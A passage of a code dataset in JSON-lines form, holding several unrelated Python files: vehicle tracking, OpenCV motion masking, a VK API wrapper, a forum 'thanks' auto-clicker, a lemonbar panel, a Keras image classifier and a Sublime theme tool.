車体が退出範囲にあるか調べる\n is_exited_to_left = False\n is_exited_to_right = False\n\n # 車体が重なりから脱出したものか判定\n for idx, stack_dict in reversed(list(enumerate(self.overlap_dicts))):\n stack_label_idx1, stack_label_idx2 = stack_dict.keys()\n if stack_label_idx2 in detected_obj_dicts:\n stack_v = detected_obj_dicts[stack_label_idx2]\n left2 = stack_v['left']\n right2 = stack_v['right']\n\n if left < left2 < right < right2 or left2 < left < right2 < right:\n label_idx = stack_label_idx1\n\n d = stack_dict[label_idx]\n direction = d['direction']\n speed = d['speed']\n is_entried_from_left = d['is_entried_from_left']\n is_entried_from_right = d['is_entried_from_right']\n is_exited_to_left = d['is_exited_to_left']\n is_exited_to_right = d['is_exited_to_right']\n\n self.overlap_dicts.pop(idx)\n else:\n self.overlap_dicts.pop(idx)\n\n\n color = colors[label_idx % len(colors)]\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': is_first_frame_detected,\n 'direction': direction,\n 'speed': speed,\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n\n # 検出した車体間の座標の近さを計算\n closes = []\n for k, v in detected_obj_dicts.items():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n closes.append(close)\n closenesses.append(closes)\n\n use_label_idxs.append(label_idx)\n use_label_idxs.sort()\n if not label_idx in self.used_label_idxs:\n self.used_label_idxs.append(label_idx)\n self.used_label_idxs.sort()\n detected_obj_dicts[label_idx] = detected_obj_dict\n out_boxes_2.append(box)\n out_label_idxs.append(label_idx)\n out_scores_2.append(score)\n out_classes_2.append(c)\n out_colors_2.append(color)\n # 前フレームに同一と思われる物体がある場合\n else:\n # 同じ物体を複数回検出している問題を解決\n break_flag = False\n for k, v in detected_obj_dicts.items():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n\n if close < 400 * self.resize_ratio ** 2:\n break_flag = True\n break\n if break_flag: continue\n\n for k, v in 
detected_obj_dicts.items():\n if label_idx == k:\n pre_center = v['center']\n break\n\n # 同フレームにすでに、そのラベル番号が振られた物体がある場合、新しい物体とする\n if label_idx in use_label_idxs:\n label_idx = self.used_label_idxs[-1] + 1\n direction = 'unknown'\n speed = 'unknown'\n\n # 車体が進入範囲にあるか調べる\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n is_entried_from_left = True\n is_entried_from_right = False\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n is_entried_from_left = False\n is_entried_from_right = True\n self.entry_from_right_count += 1\n else:\n is_entried_from_left = False\n is_entried_from_right = False\n\n # 車体が退出範囲にあるか調べる\n is_exited_to_left = False\n is_exited_to_right = False\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': True,\n 'direction': 'unknown',\n 'speed': 'unknown',\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n else:\n speed = center[0] - pre_center[0]\n direction = 'left' if speed < 0 else 'right'\n\n # 車体が進入範囲にあるか調べる\n is_entried_from_left = self.pre_detected_obj_dicts[label_idx]['is_entried_from_left']\n is_exited_to_right = self.pre_detected_obj_dicts[label_idx]['is_exited_to_right']\n is_entried_from_right = self.pre_detected_obj_dicts[label_idx]['is_entried_from_right']\n is_exited_to_left = self.pre_detected_obj_dicts[label_idx]['is_exited_to_left']\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n # 左右の進入判定がなく、右への退出判定がない場合\n if not is_entried_from_left and not is_entried_from_right and not is_exited_to_right:\n is_entried_from_left = True\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n # 左右の進入判定がなく、左への退出判定がない場合\n if not is_entried_from_left and not is_entried_from_right and not is_exited_to_left:\n is_entried_from_right = True\n self.entry_from_right_count += 1\n\n # 車体が退出範囲にあるか調べる\n if self.exit_to_left_range[0] < center[0] < self.exit_to_left_range[1]:\n # 右からの進入判定があり、左への退出判定がない場合\n if is_entried_from_right and not is_exited_to_left:\n is_exited_to_left = True\n self.exit_to_left_count += 1\n elif self.exit_to_right_range[0] < center[0] < self.exit_to_right_range[1]:\n # 左からの進入判定があり、右への退出判定がない場合\n if is_entried_from_left and not is_exited_to_right:\n is_exited_to_right = True\n self.exit_to_right_count += 1\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': False,\n 'direction': direction,\n 'speed': speed,\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n\n # 検出した車体間の座標の近さを計算\n closes = []\n for v in detected_obj_dicts.values():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n closes.append(close)\n closenesses.append(closes)\n\n use_label_idxs.append(label_idx)\n use_label_idxs.sort()\n if not label_idx in self.used_label_idxs:\n self.used_label_idxs.append(label_idx)\n self.used_label_idxs.sort()\n detected_obj_dicts[label_idx] = detected_obj_dict\n out_boxes_2.append(box)\n 
out_label_idxs.append(label_idx)\n                    out_scores_2.append(score)\n                    out_classes_2.append(c)\n                    out_colors_2.append(color)\n\n        vanishing_label_idxs = []\n        if len(self.pre_detected_obj_dicts) != 0:\n            # 消えたラベル番号を特定\n            cur_label_idxs = detected_obj_dicts.keys()\n            for k in self.pre_detected_obj_dicts.keys():\n                label_idx = k\n                if not label_idx in cur_label_idxs:\n                    vanishing_label_idxs.append(label_idx)\n\n            # 車体の重なり判定\n            pre_label_idxs = self.pre_detected_obj_dicts.keys()\n            for vanishing_label_idx in vanishing_label_idxs:\n                for label_idx in pre_label_idxs:\n                    if vanishing_label_idx != label_idx:\n                        # 前フレームで、X座標が重なっているか確認\n                        v1 = self.pre_detected_obj_dicts[vanishing_label_idx]\n                        v2 = self.pre_detected_obj_dicts[label_idx]\n\n                        l1 = v1['left']\n                        r1 = v1['right']\n                        l2 = v2['left']\n                        r2 = v2['right']\n\n                        if l1 < l2 < r1 < r2 or l2 < l1 < r2 < r1:\n                            stack_dict = {}\n                            stack_dict[vanishing_label_idx] = self.pre_detected_obj_dicts[vanishing_label_idx]\n                            stack_dict[label_idx] = self.pre_detected_obj_dicts[label_idx]\n                            self.overlap_dicts.append(stack_dict)\n\n        self.pre_detected_obj_dicts = detected_obj_dicts\n\n        print('use_label_idxs:', use_label_idxs)\n        print('vanishing_label_idxs:', vanishing_label_idxs)\n        if len(self.overlap_dicts) == 0:\n            print('self.overlap_dicts: None')\n        else:\n            print('self.overlap_dicts:')\n            for i, d in enumerate(self.overlap_dicts):\n                print('----------', i, '----------')\n                for k, v in d.items():\n                    print('label_idx:', k, '=>', v)\n                print('-----------------------')\n        print('detected_obj_dicts:')\n        for k, v in detected_obj_dicts.items():\n            print('label_idx:', k, '=>', v)\n\n        print('self.entry_from_left_count:', self.entry_from_left_count)\n        print('self.entry_from_right_count:', self.entry_from_right_count)\n        print('self.exit_to_left_count:', self.exit_to_left_count)\n        print('self.exit_to_right_count:', self.exit_to_right_count)\n\n        # ラベル番号に被りがないかチェック\n        label_idxs_for_debug = detected_obj_dicts.keys()\n\n        assert len(label_idxs_for_debug) == len(set(label_idxs_for_debug))\n\n        return out_boxes_2, out_label_idxs, out_scores_2, out_classes_2, out_colors_2\n","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":24198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"580974094","text":"# -*- coding: utf-8 -*-\n\n\nimport sys\nsys.path.append(\"../\")\nfrom geometry.vec import *\nfrom geometry.circle import *\nfrom geometry.line import *\nfrom pathfinding import *\n\n\n# importation de la bibliotheque graphique Tkinter\nfrom Tkinter import *\n# creation d’une fenetre\nfenetre=Tk()\nfenetre.title('dessin')\n# creation d’un canevas\ncanevas=Canvas(fenetre)\ncanevas.configure(width=500,height=500,bg='white')\ncanevas.pack()\n\nline = None\npion = Vec2(250,250)\ncircle = Circle(pion,50)\ntype = 1\n\ndef clic(event):\n\tglobal type\n\ttype = -type\n\tmotion(event)\n\ndef motion(event):\n\tglobal line\n\tif line: canevas.delete(line)\n\tT = Vec2(event.x,event.y).tangente(circle,type)\n\t#T = circle.tangente(Vec2(event.x,event.y),type)\n\tline = T.tracer(canevas,fill=\"black\")\n\ncanevas.bind('<Button-1>', clic)\ncanevas.bind('<Motion>', motion)\n\n\ncanevas.create_oval(pion.x-50,pion.y-50,pion.x+50,pion.y+50,outline='blue',width=1)\n\n# attente des evenements\nfenetre.mainloop()\n","sub_path":"IA/testpath/test_tangente_point.py","file_name":"test_tangente_point.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"324791821","text":"\r\nimport 
numpy as np\r\nimport cv2\r\n\r\ndef rescale_frame(frame, percent=75):\r\n    width = int(frame.shape[1] * percent/ 100)\r\n    height = int(frame.shape[0] * percent/ 100)\r\n    dim = (width, height)\r\n    return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)\r\ndef GrayTo3DGray(img_gray):\r\n    h,w=img_gray.shape \r\n    gray3D=np.zeros((h,w,3),dtype=np.uint8)\r\n    for i in range(0,3):\r\n        gray3D[:,:,i]=img_gray\r\n    return gray3D\r\n\r\n\r\n\r\nfile=\"videos/Dance_1.mp4\"\r\ncap = cv2.VideoCapture(file)\r\n\r\nfourcc =cv2.VideoWriter_fourcc('m', 'p', '4', 'v') # ファイル形式(ここではmp4) #cv2.VideoWriter_fourcc(*'XVID')\r\noutname=\"videos/Dance_layertest.mp4\"\r\n\r\nout=None\r\navg=None\r\ni=0\r\nw=None\r\nh=None\r\nBGRcol=[0,255,255]\r\n\r\n\r\nwhile(cap.isOpened()):\r\n\r\n    try:\r\n        i+=1\r\n        ret,frame= cap.read()\r\n        frame= rescale_frame(frame,percent=8)\r\n        gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n\r\n        #accumulate Weighted\r\n        # 前フレームを保存\r\n        if avg is None:\r\n            avg = gray.copy().astype(\"float\")\r\n            \r\n            continue\r\n        #if i % 50 ==1:\r\n        #    avg = gray.copy().astype(\"float\")\r\n        #    continue\r\n\r\n        cv2.accumulateWeighted(gray,avg,0.1)\r\n        frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(avg))\r\n\r\n        #領域を抽出\r\n        threash=cv2.threshold(frameDelta,50,255,cv2.THRESH_BINARY)[1]\r\n        # 輪郭を見つける\r\n        #_, contours, hierarchy = cv2.findContours(thresh.copy(), \r\n        #cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n        #新しいのフラームを作成する\r\n        if w==None:\r\n            h,w,c=frame.shape\r\n            background=np.zeros((h,w,3),dtype=np.uint8)\r\n            mask=np.zeros((h,w,3),dtype=np.uint8)\r\n            for c,col in enumerate(BGRcol):\r\n                background[:,:,c]=col\r\n                mask[:,:,c]=threash\r\n        #print(background.shape)\r\n        #print(mask.shape)\r\n        mask=GrayTo3DGray(threash)\r\n        frame_masked = cv2.bitwise_and(background,mask)\r\n\r\n        gray=GrayTo3DGray(gray)\r\n        frameDelta=GrayTo3DGray(frameDelta)\r\n\r\n        frametop=cv2.hconcat([gray,frameDelta])\r\n        framebot=cv2.hconcat([mask,frame_masked])\r\n        outframe=cv2.vconcat([frametop,framebot])\r\n        \r\n        cv2.imshow(\"Dance\",outframe)\r\n\r\n        if out==None:\r\n            h,w,c=gray.shape\r\n            out = cv2.VideoWriter(outname,fourcc, 20.0, (2*w,2*h))\r\n\r\n        out.write(outframe)\r\n        if cv2.waitKey(1) & 0xFF == ord('q'):\r\n            break\r\n    except:\r\n        break\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()","sub_path":"motion_track_writeVideo.py","file_name":"motion_track_writeVideo.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"263252225","text":"from typing import Optional\r\n\r\n\r\nclass HyperCINoiseScalar(float):\r\n    def __new__(cls, scale_factor=0.0):\r\n        return super().__new__(cls, scale_factor)\r\n\r\n    def __init__(self, scale_factor=0.0):\r\n        \"\"\"\r\n        The hyper_ci-parameter factor by which the noises is scaled when included in the model-fitting process.\r\n        \"\"\"\r\n        float.__init__(scale_factor)\r\n\r\n    def scaled_noise_map_from(self, noise_scaling):\r\n        \"\"\"\r\n        Returns the scaled noises map, by multiplying the noises-scaling image by the hyper_ci-parameter factor.\r\n        \"\"\"\r\n        return self * noise_scaling\r\n\r\n\r\nclass HyperCINoiseCollection:\r\n    def __init__(\r\n        self,\r\n        regions_ci: Optional[HyperCINoiseScalar] = None,\r\n        parallel_eper: Optional[HyperCINoiseScalar] = None,\r\n        serial_eper: Optional[HyperCINoiseScalar] = None,\r\n        serial_overscan_no_eper: Optional[HyperCINoiseScalar] = None,\r\n    ):\r\n        self.regions_ci = regions_ci\r\n        self.parallel_eper = parallel_eper\r\n        self.serial_eper = serial_eper\r\n        
self.serial_overscan_no_eper = serial_overscan_no_eper\r\n\r\n @property\r\n def as_dict(self):\r\n hyper_dict = {\r\n \"regions_ci\": self.regions_ci,\r\n \"parallel_eper\": self.parallel_eper,\r\n \"serial_eper\": self.serial_eper,\r\n \"serial_overscan_no_eper\": self.serial_overscan_no_eper,\r\n }\r\n\r\n return {key: value for key, value in hyper_dict.items() if value is not None}\r\n","sub_path":"autocti/charge_injection/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"12255951","text":"'''\nUSAGE:\nform_request = {'access_token': VK_TOKEN,\n'v': str(API_VERSION),\n'param1': 'val1',\n'param2': 'val2'}\nrequest = Api('users.get', form_request)\nresponse = request.response\n'''\nimport requests\n\nclass Api(object):\n def __init__(self, str, dict):\n self.method = str\n self.args = dict\n self.response = {}\n if self.method != 'messages.getLongPollHistory':\n self.call()\n else:\n self.mcall()\n\n def call(self):\n form = 'https://api.vk.com/method/%s?' %self.method\n fd = {}\n for param, value in self.args.items():\n fd[param] = value\n request = requests.get(form, params=fd)\n response = request.json()\n self.response = response\n\n def mcall(self):\n form = 'http://%s?' %self.args.pop('server')\n for param, value in self.args.items():\n form = form + param + '=' + str(value) + '&'\n form = form[:-1]\n request = requests.get(form)\n response = request.json()\n self.response = response","sub_path":"myvkapi.py","file_name":"myvkapi.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"126815278","text":"from contextlib import contextmanager\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom selenium.webdriver import ActionChains\nimport time\n\n\n@contextmanager\ndef selen(driver_patch: str, profile_patch: str, config='windows') -> webdriver.Chrome:\n \"\"\"\n Самый удобный метод использования веб драйвера =)\n :param driver_patch: str: patch to chromedriver(exe)\n :param profile_patch: str: the path to the folder storing cookies\n :param config: str: operating system\n :return: webdriver.Chrome\n \"\"\"\n\n def windows_conf():\n options = webdriver.ChromeOptions()\n options.add_argument(f'user-data-dir={profile_patch}')\n driver = webdriver.Chrome(executable_path=driver_patch, chrome_options=options)\n return driver\n\n def linux_conf():\n options = webdriver.ChromeOptions()\n arguments = ('headless', '--no-sandbox', '--disable-dev-shm-usage', f'user-data-dir={profile_patch}')\n for option in arguments:\n options.add_argument(option)\n\n driver = webdriver.Chrome(executable_path=driver_patch, chrome_options=options)\n return driver\n\n configs = {'windows': windows_conf, 'linux': linux_conf}\n web_driver = configs.get(config)()\n\n try:\n yield web_driver\n web_driver.close()\n time.sleep(1)\n web_driver.quit()\n\n except Exception as error:\n web_driver.close()\n time.sleep(1)\n web_driver.quit()\n raise Exception(error)\n\n\nwith selen(r'C:\\chromedriver.exe', 'C:\\profile') as browser:\n # Стартовая страница\n browser.get('http://nnmclub.to/forum/portal.php?c=10')\n\n def get_all_posts_page() -> list:\n # Получаем все ссылки на посты внутри одной страницы.\n\n p = browser.find_elements_by_xpath('//a[@class=\"pcomm tit-b bold\"]')\n posts = []\n\n for i in p:\n 
posts.append(i.get_attribute(\"href\"))\n\n # Переход на следующую страницу\n browser.find_element_by_link_text(u\"След.\").click()\n return posts\n\n\n def scrapy_links(iter:int) -> list:\n # Принимаем число страниц которые нужно собрать, отадёт список ссылок.\n good_list = []\n for page in range(iter):\n good_list.extend(get_all_posts_page())\n\n return good_list\n\n\n def thanks():\n # Ищет на странице кнопку спасибо, если она есть и не нажата то нажимает.\n\n try:\n bottom = browser.find_element_by_xpath(u\"//img[@alt='Спасибо']\")\n bottom.click()\n\n except NoSuchElementException:\n pass\n\n\n def main():\n all_link = scrapy_links(10)\n for i in all_link:\n browser.get(i)\n thanks()\n\n main()\n","sub_path":"merci.py","file_name":"merci.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448929782","text":"import pexpect, atexit\nfrom threading import Thread, Lock\nfrom time import time, sleep\nimport xrdb\n\n\ndef delay_loop(delay):\n\t\"\"\"DECORATOR: runs function in infinite loop,\n\tsleeps until time is next multiple of \n\t\"\"\"\n\tdef wrapper(function):\n\t\tdef wrappee(*args):\n\t\t\twhile True:\n\t\t\t\tstart_time = time()\n\t\t\t\tfunction(*args)\n\t\t\t\telapsed = (time() - start_time) % delay\n\t\t\t\tsleep(delay - elapsed)\n\t\treturn wrappee\n\treturn wrapper\n\nclass PopenLoopThread(Thread):\n\t\"\"\"PopenLoopThread(command, delay, **Thread_kwargs):\n\tGiven `command` and `delay`, run command every delay seconds`\n\t\"\"\"\n\tdef __init__(self, command, delay, *args, **kwargs):\n\t\tself.lock = Lock()\n\t\tself.command = command\n\t\tif not command:\n\t\t\tself.run = lambda: None\n\t\telif delay:\n\t\t\tself.run = delay_loop(delay)(self.run)\n\t\tself._state = \"\"\n\t\tsuper().__init__(**kwargs)\n\n\tdef update(self):\n\t\tself.lock.acquire()\n\t\tself._state = pexpect.runu(self.command)[:-2]\n\t\tself.lock.release()\n\n\tdef run(self):\n\t\tself.update()\n\n\t@property\n\tdef state(self):\n\t\ttry:\n\t\t\tself.lock.acquire()\n\t\t\treturn self._state\n\t\tfinally:\n\t\t\tself.lock.release()\n\nclass Chunk(PopenLoopThread):\n\t\"\"\"PopenLoopThread wrapped with styling and formatting\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tself.format = kwargs.pop('formatter', None)\n\t\tself.background = kwargs.pop('background', None)\n\t\tself.foreground = kwargs.pop('foreground', None)\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef render(self, prev=None, next=None):\n\t\tret_str = \"\"\n\t\tif prev:\n\t\t\tsep = ''\n\t\t\tif prev.background:\n\t\t\t\tsep = \"%{B\" + prev.background + \"}\" + sep + \"%{B-}\"\n\t\t\t\tsep = \"%{F\" + (self.background or prev.background) + \"}\" + sep + \"%{F-}\"\n\t\t\tret_str += sep\n\t\tstate = ' ' + self.state + ' '\n\t\tif self.foreground:\n\t\t\tstate = \"%{F\" + self.foreground + \"}\" + state + \"%{F-}\"\n\t\tif self.background:\n\t\t\tstate = \"%{B\" + self.background + \"}\" + state + \"%{B-}\"\n\t\tret_str += state\n\t\tif next:\n\t\t\tsep = ''\n\t\t\tif next.background:\n\t\t\t\tsep = \"%{B\" + next.background + \"}\" + sep + \"%{B-}\"\n\t\t\t\tsep = \"%{F\" + (self.background or next.background) + \"}\" + sep + \"%{F-}\"\n\t\t\tret_str += sep\n\t\treturn ret_str\n\n\t@property\n\tdef state(self):\n\t\tif self.format:\n\t\t\treturn self.format(super().state)\n\t\treturn super().state\n\nclass Panel:\n\tdef __init__(self, height=None, font=None, foreground=None, background=None):\n\t\t\"\"\"\n\t\tStart the lemonbar process with 
an open pipe, and prepare bspwm.\n\t\t\"\"\"\n\t\tself.thread = {}\n\t\tself.xrdb = xrdb.query(self.__class__.__name__)\n\t\tself.height = height or self.xrdb['height'] or 12\n\t\tself.font = font or self.xrdb['font'] or 'Monospace Sans'\n\t\tself.foreground = foreground or self.xrdb.get('foreground') or '#ffffff'\n\t\tself.background = background or self.xrdb.get('background') or '#000000'\n\t\tself._layout = {'l': [], 'r': [], 'c': []}\n\n\t\tself.bar = pexpect.spawn(\"lemonbar\" +\\\n\t\t\t\t\" -g x\" + self.height +\\\n\t\t\t\t\" -f '\" + self.font + \"'\" +\\\n\t\t\t\t\" -F \" + self.foreground +\\\n\t\t\t\t\" -B \" + self.background)\n\t\tpexpect.run(\"bspc config top_padding \" + self.xrdb['height'])\n\t\tatexit.register(self.cleanup)\n\n\tdef start_thread(self, name, command, delay, formatter=None, background=None, foreground=None):\n\t\txrdb = self.xrdb.get(name)\n\t\tbackground = background or (xrdb and xrdb.get('background'))\n\t\tforeground = foreground or (xrdb and xrdb.get('foreground'))\n\t\tself.thread[name] = Chunk(\n\t\t\t\tcommand, delay,\n\t\t\t\tformatter=formatter,\n\t\t\t\tbackground=background,\n\t\t\t\tforeground=foreground,\n\t\t\t\tdaemon=True)\n\t\tself.thread[name].start()\n\n\tdef layout(self, *chunks):\n\t\tif not chunks:\n\t\t\traise TypeError('layout takes >=2 arguments, but 1 was given')\n\t\targtype = type(chunks[0]).__name__\n\t\tif argtype == 'str':\n\t\t\talign = self._layout['l']\n\t\t\tfor chunk in chunks:\n\t\t\t\tif chunk in ['l', 'r', 'c', 'left', 'right', 'center']:\n\t\t\t\t\talign = self._layout[chunk[0]]\n\t\t\t\telse:\n\t\t\t\t\talign.append(chunk)\n\t\telse:\n\t\t\traise TypeError('invalid layout format')\n\n\t@delay_loop(1)\n\tdef run(self):\n\t\tformatted_state = \"\"\n\t\tfor align in ['l', 'c', 'r']:\n\t\t\tchunks = self._layout[align]\n\t\t\tformatted_state += '%{' + align + '}'\n\t\t\tfor i in range(len(chunks)):\n\t\t\t\tthread = self.thread[chunks[i]]\n\t\t\t\tif align == 'l':\n\t\t\t\t\tif i == len(chunks) - 1:\n\t\t\t\t\t\tnext = self\n\t\t\t\t\telse:\n\t\t\t\t\t\tnext = self.thread[chunks[i+1]]\n\t\t\t\t\tchunk = thread.render(next=next)\n\t\t\t\telif align == 'c':\n\t\t\t\t\tprev = next = None\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tprev = self\n\t\t\t\t\tif i == len(chunks) - 1:\n\t\t\t\t\t\tnext = self\n\t\t\t\t\tchunk = thread.render(prev=prev, next=next)\n\t\t\t\telif align == 'r':\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tprev = self\n\t\t\t\t\telse:\n\t\t\t\t\t\tprev = self.thread[chunks[i-1]]\n\t\t\t\t\tchunk = thread.render(prev=prev)\n\t\t\t\tformatted_state += chunk\n\t\tself.bar.sendline(formatted_state)\n\n\tdef cleanup(self):\n\t\tself.bar.terminate()\n\t\tpexpect.run(\"bspc config top_padding 0\")\n","sub_path":"panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502361878","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\n#import all necessary libraries for the CNN architecture \n\nimport keras\n\nimport numpy as np \n\nfrom keras import backend as K \n\nfrom keras import optimizers\n\nfrom keras.models import Sequential \n\nfrom keras.layers import Conv2D, MaxPooling2D \n\nfrom keras.layers import Activation, Dropout, Flatten, Dense \n\nfrom keras.optimizers import Adam\n\nfrom keras.metrics import categorical_crossentropy \n\nfrom keras.preprocessing.image import ImageDataGenerator \n\nfrom keras.layers.normalization import BatchNormalization\n\nfrom keras.layers.convolutional import 
*\n\nfrom matplotlib import pyplot as plt \n\nfrom sklearn.metrics import confusion_matrix\n\nimport itertools\n\nimport matplotlib.pyplot as plt\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n#with refernce to the location of your images; create path based on your defined parameters for the folders\ntrain_path = 'cars-and-planes/train'\nvalid_path = 'cars-and-planes/valid'\ntest_path = 'cars-and-planes/test'\n\n#number of samples\nnb_train_samples = 20\nnb_test_samples = 10\nnb_valid_samples =20\nepochs = 10\n\nif K.image_data_format() == 'channels_first': \n    input_shape = (3, 224, 224) \nelse: \n    input_shape = (224, 224, 3)\n    \n#Models \n#build and Train a CNN \n#convolution is 2D image \n#input shape = height,width,channel dimension(rgb) \n#output filter = (3,3)\n#flatten layer =from rgb to 1D tensor then fed into dense layer\n#Conv2D is the layer to convolve the image into multiple images\n#Activation is the activation function.\n#MaxPooling2D is used to max pool the value from the given size matrix and same is used for the next 2 layers. \n#then, Flatten is used to flatten the dimensions of the image obtained after convolving it.\n#Dense is used to make this a fully connected model and is the hidden layer.\n#Dropout is used to avoid overfitting on the dataset.\n#Dense is the output layer contains only one neuron which decide to which category image belongs.\n\n\nmodel = Sequential() \nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape)) \nmodel.add(Activation('relu')) \nmodel.add(MaxPooling2D(pool_size=(2, 2))) \n \nmodel.add(Conv2D(32, (3, 3))) \nmodel.add(Activation('relu')) \nmodel.add(MaxPooling2D(pool_size=(2, 2))) \n \nmodel.add(Conv2D(64, (3, 3))) \nmodel.add(Activation('relu')) \nmodel.add(MaxPooling2D(pool_size=(2, 2))) \n \nmodel.add(Flatten()) \nmodel.add(Dense(64)) \nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.5)) \nmodel.add(Dense(1)) \nmodel.add(Activation('sigmoid')) \n\nmodel.compile(loss ='binary_crossentropy', \n                     optimizer ='rmsprop', \n                 metrics =['accuracy']) \ntrain_datagen = ImageDataGenerator( \n                rescale = 1. / 255, \n                    shear_range = 0.2, \n                zoom_range = 0.2, \n            horizontal_flip = True) \ntest_datagen = ImageDataGenerator(rescale = 1. 
/ 255) \n \ntrain_batches = ImageDataGenerator().flow_from_directory(train_path, \n                                target_size =(224, 224), \n                                batch_size = 10, class_mode ='binary') \nvalid_batches = ImageDataGenerator().flow_from_directory(valid_path, \n                                target_size =(224, 224), \n                                batch_size = 5, class_mode ='binary') \ntest_batches = ImageDataGenerator().flow_from_directory(test_path, \n                                target_size =(224, 224), \n                                batch_size = 10, class_mode ='binary') \nmodel.fit_generator(train_batches, \n                    steps_per_epoch = 4, \n                    epochs = 10, validation_data = valid_batches, \n                    validation_steps = 4, verbose=2) \nmodel.save_weights('model_saved.h5')\n\n\n\n\n","sub_path":"cars-and-planes.py","file_name":"cars-and-planes.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"106249048","text":"#!/usr/bin/python\n\nimport os\nimport shutil\nimport sys\nfrom termcolor import colored\nfrom zipfile import ZipFile\n\n\nclass Theme_Changer():\n\n    user_home = ''\n    user_config = ''\n    sub_dir = ''\n    package_dir = ''\n    pref_dir = ''\n    user_config = ''\n    theme_package = ''\n    color_package = ''\n\n    def __init__(self):\n        self.get_paths()\n\n    def get_paths(self):\n        self.user_home = os.environ['HOME']\n        self.sub_dir = self.user_home + '/.config/sublime-text-3/'\n        self.package_dir = self.sub_dir + \"Installed Packages/\"\n        self.pref_dir = self.sub_dir + 'Packages/User/'\n        self.user_config = self.user_home + '/.config/sublime_preferences/'\n        self.file_name = ''\n\n    def validate(self):\n        if not os.path.isdir(self.sub_dir):\n            raise FileNotFoundError(\"Can't find sublime config directory in {}\".format(self.sub_dir))\n        if not os.path.isdir(self.package_dir):\n            raise FileNotFoundError(\"Can't find sublime installed packages directory at {}\".format(self.package_dir))\n        if not os.path.isdir(self.pref_dir):\n            raise FileNotFoundError(\"Can't find sublime user packages directory at {}\".format(self.pref_dir))\n\n        if not os.path.exists(self.user_config):\n            ans = input(\"\\nThere is not directory for your preferences.\\nWould you like to create one in \" + self.user_config + \"? [Y\\\\n] \")\n            if ans.startswith('y'):\n                os.makedirs(self.user_config)\n\n        settings_files = os.listdir(self.user_config)\n        if settings_files == []:\n            ans = input(\"\\n\\nNo files in your preferences directory.\\nWould you like to copy over the default sublime preferences file? 
